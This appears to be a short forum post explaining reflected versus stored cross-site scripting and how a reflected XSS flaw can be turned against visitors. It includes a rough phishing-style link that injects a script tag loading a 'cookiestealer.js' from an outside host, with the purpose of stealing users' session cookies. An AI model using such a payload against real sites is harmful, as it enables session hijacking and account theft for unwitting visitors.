What you are creating is a temporary XSS, injecting code that is only run by you... the danger is in this particular case showing source code... but not a permanent defacement of the webpage.
Permanent XSS on the other hand is quite dangerous. This is generally due to an unsanitized user input box, url get, etc.., which could potentially end up saving malicious code int he database or the page itself.
I think the way to take advantage of a temporary XSS exploit, however... is to using a referral link send browsers to that exploit in such a manner as that they load a cookie stealer into the site. something like...
- Code: Select all
<a href="xyz.com/login.php?var1=<script src="abc.com/cookiestealer.js">CLICK HERE TO LOGIN TO XYZ.COM</a>
my example is rough.. but thats the general concept... its not the site that has the vulnerability but the users visiting the site are vulnerable.
sanddbox will correct me if i'm wrong